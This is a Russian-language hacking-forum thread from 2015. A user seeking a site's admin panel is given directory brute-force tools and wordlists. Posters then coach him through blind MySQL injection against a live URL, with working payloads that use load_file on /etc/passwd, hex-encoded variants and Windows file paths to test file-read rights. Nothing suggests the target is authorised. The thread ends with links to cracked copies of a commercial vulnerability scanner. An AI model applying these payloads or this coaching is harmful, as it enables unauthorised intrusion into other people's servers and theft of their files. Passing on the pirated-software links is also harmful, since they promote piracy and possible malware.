PDA

Просмотр полной версии : Помощь в поиске админки


3nvY
08.08.2015, 19:06
Привет всем. Нужна помощь в поиске админки. Искал 2мя тулзами но результата 0.

Подскажите онлайн ресурс какой или софт, или может приватно кто-нибудь поможет?

grimnir
08.08.2015, 19:22
кидай посмотрю

faza02
08.08.2015, 20:06
nikto

dirb

dirs3arch

dnsmap (поддомены)

+ fuzz.txt https://bo0om.ru/fuzz.txt

+ listpath.txt https://yarbabin.ru/stuff/listpath.txt

3nvY
10.08.2015, 11:30
Может быть такое, что получить удалённый доступ к админке невозможно?

i~DOS
10.08.2015, 11:55
↑ (https://antichat.live/posts/3878382/)
Может быть такое, что получить удалённый доступ к админке невозможно?


Да, если, например, доступ разрешен только с определенных ip\диапазонов ip, либо по специальному user-агенту, и.т.д. Точнее получить-то его возможно, но весьма затруднительно.

3nvY
10.08.2015, 12:03
А где можно почитать про такие случаи поподробнее? Хочу доделать то что начал до конца)

3nvY
10.08.2015, 12:41
И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).

faza02
10.08.2015, 12:54
↑ (https://antichat.live/posts/3878414/)
И ещё вопрос (сори что не по теме) можно ли провести проверку на чтение/запись файлов через MySql Inj, если стоит фильтр на UNION (Все известные мне способы обхода фильтра я, естественно, попробовал).


and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+

3nvY
11.08.2015, 09:43
↑ (https://antichat.live/posts/3878422/)
and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+


Тоесть если есть возможность загрузки то при:

site.ru/index.php?id=1 and 1=if(load_file('/etc/passwd') is not NULL,1,2)--+

Выведет то же самое что и при:

site.ru/index.php?id=1

Я правильно понимаю?

3nvY
11.08.2015, 10:55
Чёт нифига не правильно

faza02
11.08.2015, 11:25
is NULL и is not NULL - во втором случае получите TRUE, если есть права

3nvY
11.08.2015, 11:49
Проверяю данные запросы в консоли

SELECT 1 AND 1=if(load_file('/etc/passwd') is not NULL,1,2); Возвращает 1.

SELECT 1 AND 1=if(load_file('/etc/passwd') is NULL,1,2); Возвращает 0.

Но когда подставляю на сайте что в первом, что во втором случае отображается то же самое, что и при: site.ru/index.php?id=1

Но если делаю так: site.ru/index.php?id=1 and 1=0--+

Возвращает пустую страницу.

Это значит что нет прав на загрузку файла?

Может я что-то делаю не так?=\

faza02
11.08.2015, 12:54
может что-то не так. может кавычки у вас экранируются, может /etc/passwd блокирует WAF, или еще что-то. но результаты при этих запросах должны отличатся вне зависимости от того, есть права или нет.

3nvY
11.08.2015, 16:05
Теперь такой запроc: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ Возвращает пустую страницу.

Может сервер на винде...

yarbabin,Спасибо огромное за помощь буду дальше пытаться ковырять

faza02
11.08.2015, 16:07
и толку что вы спрятали слово в кавычках в хекс и анхекс? load_file(0x2f6574632f706173737764)

3nvY
11.08.2015, 16:08
Но теперь хотя бы есть результат)

3nvY
11.08.2015, 16:12
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd'))) is NULL,1,2)--+ отображается как и при site.ru/index.php?id=1

а при AND 1=if(load_file(unhex(hex('/etc/passwd'))) is not NULL,1,2)--+ пустая страница.

То же самое и при and 1=if(load_file(0x2f6574632f706173737764) is not NULL,1,2)--+

и

and 1=if(load_file(0x2f6574632f706173737764) is NULL,1,2)--+

просто под рукой сейчас нчего нет что в хекс кодирует строку)

BigBear
11.08.2015, 16:32
↑ (https://antichat.live/posts/3878901/)
При таком запросе: AND 1=if(load_file(unhex(hex('/etc/passwd')))
is NULL
,1,2)--+ отображается как и при site.ru/index.php?id=1
а при AND 1=if(load_file(unhex(hex('/etc/passwd')))
is not NULL
,1,2)--+ пустая страница.


and 1=1 TRUE

and 1=2 FALSE

Соответственно, load_file(unhex(hex('/etc/passwd')) возвращает null, у вас нет прав на чтение.

3nvY
11.08.2015, 16:39
Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).

Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.

BigBear
11.08.2015, 17:07
↑ (https://antichat.live/posts/3878915/)
Это я понял. Просто думаю если серв на винде то путь другой будет. Сейчас времени нет тестить (не дома нахожусь).
Под вендой в консоли при запросе select 1 and 1=if(load_file('/etc/passwd') is not NULL,1,2); вернётся false так как такого пути не существует.


C:\boot.ini

C:\Windows\System32\drivers\etc\hosts

3nvY
11.08.2015, 19:44
Короче нет там прав на чтение. Всем спасибо. Пойду думать дальше.

comstream
12.08.2015, 17:31
Aqunetix - клёвый софт для этого. Но бывает сайту тупо состоит из набора html статических страниц и там просто нет админики )))

grimnir
13.08.2015, 21:11
↑ (https://antichat.live/posts/3879342/)
Aqunetix - клёвый софт для этого. Но бывает сайту тупо состоит из набора html статических страниц и там просто нет админики )))


Acunetix он пишется https://www.acunetix.com/

3nvY
15.08.2015, 20:31
Можно ссылочку на фулл версию?)

hahanovB
15.08.2015, 21:34
↑ (https://antichat.live/posts/3880541/)
Можно ссылочку на фулл версию?)


Держи http://rutracker.org/forum/viewtopic.php?t=4930387

Последняя версия http://www.52pojie.cn/thread-377625-1-1.html ИЛИ http://mytestvps.com/wordpress/acunetix-web-vulnerability-scanner-10-cracked-version-download.html ИЛИ http://www.freebuf.com/tools/71091.html - я не проверял возможно есть вирусы...